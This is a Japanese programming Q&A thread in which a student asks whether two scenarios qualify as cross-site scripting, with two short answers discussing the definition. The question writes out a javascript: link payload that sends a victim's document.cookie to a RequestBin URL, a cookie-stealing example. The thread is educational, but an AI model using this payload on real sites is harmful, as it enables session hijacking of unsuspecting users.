Q&A
あなたの理解した内容を発表する場なのでは?
前の質問は XSS から外れてたし、ちゃんと理解していないのでは?
ちょっと丸投げが過ぎると思います。
情報系学生で昨日もXSS(クロスサイトスクリプティング)に関する質問をさせていただいたものです。
どこからどこまでがXSSの具体例と言っていいのかを聞きたいです
下記に示しております事例1、事例2がそれぞれXSSの具体例として適切であるかご意見いただけると幸いです
事例1
下記画像にあるようなXSSに対する脆弱性がある掲示板に、悪意のあるユーザがRequestBinというサイトにクリックするとセッション情報を送る<a href=javascript:window.location='RequestBinのURL?'.concat(document.cookie);>アンケート</a>というコードを埋め込んだとして、これを一般ユーザがクリックして実際にセッション情報が奪われた。
事例2
下記画像に大まかな流れが書いてあるのですが、詳しく説明すると
①攻撃者が脆弱性のあるサイトAのURLにスクリプトを埋め込んだものを掲示板に投稿する
②一般ユーザが掲示板に投稿されているサイトAのURLをクリックする
③スクリプトを埋め込まれているURLでサイトAにアクセス
④スクリプトが埋め込まれたファイルが送られユーザのブラウザで実行される
⑤ユーザのブラウザ上で「ウイルスに感染しました」などのalertが表示される
お手数をおかけしますが、解答よろしくお願いします
あまり、質問としてなってないと思います
回答2件
0
ベストアンサー
いずれもXSSの例であることは疑いがありますが、事例2の方は、あまり適切な例ではないと思います。なぜなら、
ユーザのブラウザ上で「ウイルスに感染しました」などのalertが表示される
だけであれば、サイトAの脆弱性を使わなくてもできるからです。被害者は掲示板でリンク先のアクセスはするわけですから、攻撃者のサイトに遷移させても任意文言でのalert表示はできます。XSSを使う場合と使わない場合は、リンク先が信頼のおけるドメインであるか否かで、これ自体は意味がありますが、XSSのように色々なことができる脆弱性を使ったわりには見返りが少なく「もったいない」応用であるように思いました。
投稿2021/01/26 13:18
総合スコア11705
0
いずれも XSS だと思います。
わたしは Wikipedia の定義で問題ないと思っています。
https://ja.wikipedia.org/wiki/%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0
気になる点はある場合、「これこれの特徴があるので XSS に当てはらまないのでは?」という見解を書いていただければと。
投稿2021/01/26 05:26
総合スコア2022
あなたの回答
tips
プレビュー
